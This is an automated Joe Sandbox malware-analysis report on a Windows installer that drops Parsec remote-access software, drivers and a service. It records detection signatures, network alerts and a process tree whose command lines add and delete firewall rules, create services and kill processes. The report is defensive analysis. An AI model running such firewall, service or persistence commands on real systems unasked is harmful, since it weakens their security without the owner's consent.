Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uu8v4UUzTU.exe

Overview

General Information

Sample name:uu8v4UUzTU.exe
renamed because original name is a hash value
Original sample name:4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9.exe
Analysis ID:1555525
MD5:2d2f050e6c898065032cb2686a0effca
SHA1:0d3c1fbd9b7db74fdb5ee155b610d86319d9fa51
SHA256:4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9
Tags:exeuser-suspicious_link
Infos:

Detection

Score:42
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Creates files in the system32 config directory
Modifies the windows firewall
Sample is not signed and drops a device driver
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Tries to open files direct via NTFS file id
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries device information via Setup API
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • uu8v4UUzTU.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\uu8v4UUzTU.exe" MD5: 2D2F050E6C898065032CB2686A0EFFCA)
    • uu8v4UUzTU.tmp (PID: 5600 cmdline: "C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp" /SL5="$1043C,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe" MD5: 828B7D7624C14BE1F3D8122F6E2FAC53)
      • cmd.exe (PID: 3788 cmdline: "CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 7z.exe (PID: 5364 cmdline: "C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\" MD5: 9A1DD1D96481D61934DCC2D568971D06)
      • cmd.exe (PID: 6644 cmdline: "CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6516 cmdline: "CMD" /C del "SoundNight.7z" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1708 cmdline: "cmd" /C "C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • parsec-windows.exe (PID: 3868 cmdline: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe MD5: 01EF58E7C144C701B2EA01CFC049DBE4)
          • wscript.exe (PID: 6020 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • sc.exe (PID: 5588 cmdline: "C:\Windows\System32\sc.exe" control Parsec 200 MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 2940 cmdline: "C:\Windows\System32\taskkill.exe" /F /IM parsecd.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
              • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 3788 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-remove.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • sc.exe (PID: 5356 cmdline: "C:\Windows\System32\sc.exe" stop Parsec MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 5704 cmdline: "C:\Windows\System32\sc.exe" delete Parsec MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 5228 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-remove.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • netsh.exe (PID: 3652 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 5780 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsec.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • netsh.exe (PID: 5972 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=parsecd.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 6764 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • schtasks.exe (PID: 6544 cmdline: "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 2804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 6548 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe" MD5: FF00E0480075B095948000BDC66E81F0)
            • sc.exe (PID: 6412 cmdline: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 6532 cmdline: "C:\Windows\System32\sc.exe" start Parsec MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
              • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 5944 cmdline: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\firewall-add.vbs" "C:\Program Files\Parsec\parsecd.exe" MD5: FF00E0480075B095948000BDC66E81F0)
            • netsh.exe (PID: 744 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=Parsec dir=in action=allow program="C:\Program Files\Parsec\parsecd.exe" enable=yes profile=public,private,domain MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
              • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5628 cmdline: cmd /c "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • parsec-vud.exe (PID: 2000 cmdline: "C:\Program Files\Parsec\vusb\parsec-vud.exe" /S MD5: 2D009D446A0BA83EC2F12242F7ED126C)
              • cmd.exe (PID: 4476 cmdline: cmd /c "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 4288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • nefconc.exe (PID: 5908 cmdline: "C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe" --find-hwid --hardware-id VUSBA MD5: DDDEE00430F7A3D52580B7C85D63D9DC)
              • cmd.exe (PID: 616 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • nefconw.exe (PID: 5024 cmdline: nefconw.exe --create-device-node --hardware-id Root\Parsec\VUSBA --class-name USB --class-guid "36fc9e60-c465-11cf-8056-444553540000" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 1876 cmdline: nefconw.exe --install-driver --inf-path ".\parsecvusba\parsecvusba.inf" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 384 cmdline: nefconw.exe --inf-default-install --inf-path ".\parsecvirtualds\parsecvirtualds.inf" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                  • runonce.exe (PID: 4984 cmdline: "C:\Windows\system32\runonce.exe" -r MD5: 9ADEF025B168447C1E8514D919CB5DC0)
                    • grpconv.exe (PID: 4280 cmdline: "C:\Windows\System32\grpconv.exe" -o MD5: 8531882ACC33CB4BDC11B305A01581CE)
          • cmd.exe (PID: 5800 cmdline: cmd /c "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • parsec-vdd.exe (PID: 5656 cmdline: "C:\Program Files\Parsec\vdd\parsec-vdd.exe" /S MD5: 4B9A3048286692A865187013B70F44E8)
              • wevtutil.exe (PID: 5352 cmdline: wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
                • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • wevtutil.exe (PID: 4820 cmdline: wevtutil um "C:\Program Files\Parsec Virtual Display Driver\mm.man" /fromwow64 MD5: 1AAE26BD68B911D0420626A27070EB8D)
              • cmd.exe (PID: 5840 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • nefconw.exe (PID: 5608 cmdline: .\nefconw.exe --remove-device-node --hardware-id Root\Parsec\VDA --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 2172 cmdline: .\nefconw.exe --create-device-node --class-name Display --class-guid "4D36E968-E325-11CE-BFC1-08002BE10318" --hardware-id Root\Parsec\VDA MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
                • nefconw.exe (PID: 180 cmdline: .\nefconw.exe --install-driver --inf-path ".\driver\mm.inf" MD5: E9F2BC8C82AC755F47C7F89D1530F1A1)
  • pservice.exe (PID: 3576 cmdline: "C:\Program Files\Parsec\pservice.exe" MD5: 46CD3FC327AF9109BD143BA7F16DF397)
  • svchost.exe (PID: 2804 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • drvinst.exe (PID: 5548 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.inf" "9" "464910f03" "0000000000000158" "WinSta0\Default" "0000000000000160" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 6180 cmdline: DrvInst.exe "2" "201" "ROOT\USB\0000" "C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9\parsecvusba.inf" "oem4.inf:*:*:0.2.8.0:Root\Parsec\VUSBA," "464910f03" "0000000000000158" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 1568 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\parsecvirtualds.inf" "9" "43799a85b" "0000000000000170" "WinSta0\Default" "0000000000000158" "208" "C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 4696 cmdline: DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "43799a85b" "0000000000000158" "WinSta0\Default" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 5748 cmdline: DrvInst.exe "8" "4" "C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510\parsecvirtualds.inf" "0" "4fea13f63" "0000000000000190" "WinSta0\Default" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\wscript.exe, SourceProcessId: 3788, StartAddress: FAFEB0, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 3788
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: grpconv -o, EventID: 13, EventType: SetValue, Image: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe, ProcessId: 384, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs", CommandLine: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe, ParentImage: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe, ParentProcessId: 3868, ParentProcessName: parsec-windows.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs", ProcessId: 6020, ProcessName: wscript.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own, CommandLine: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Windows\system32\wscript.exe" "C:\Program Files\Parsec\wscripts\service-install.vbs" "C:\Program Files\Parsec\pservice.exe", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6548, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\sc.exe" create Parsec binPath= "\"C:\Program Files\Parsec\pservice.exe\"" start= auto type= interact type= own, ProcessId: 6412, ProcessName: sc.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall, ProcessId: 2804, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-14T02:58:22.700068+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549709TCP
2024-11-14T02:59:01.302200+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549912TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-14T02:58:18.030414+010020283713Unknown Traffic192.168.2.54970734.160.111.145443TCP
2024-11-14T02:58:19.166828+010020283713Unknown Traffic192.168.2.549708188.114.96.3443TCP
2024-11-14T02:59:04.548903+010020283713Unknown Traffic192.168.2.549940104.18.0.181443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-14T02:58:19.902542+010020510911A Network Trojan was detected192.168.2.549708188.114.96.3443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Parsec\pservice.exeCode function: 39_2_00007FF7CD031000 #224,CryptBinaryToStringW,CertFreeCertificateContext,39_2_00007FF7CD031000
Source: uu8v4UUzTU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\ParsecJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscriptsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\firewall-add.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\firewall-remove.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\legacy-cleanup.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-install.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-kill-parsec.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-remove.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vusbJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vusb\parsec-vud.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vddJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vdd\parsec-vdd.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\teams.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\parsecd.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\pservice.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skelJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skel\parsecd-150-93b.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skel\appdata.jsonJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\uninstall.exeJump to behavior
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbuninstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\vdduninstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.cat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.inf
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\mm.man
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\uninstall.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ParsecVUD
Source: unknownHTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: uu8v4UUzTU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: RdpSaUacHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: icuin.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xpsservices.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2help.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WSClient.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2help.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
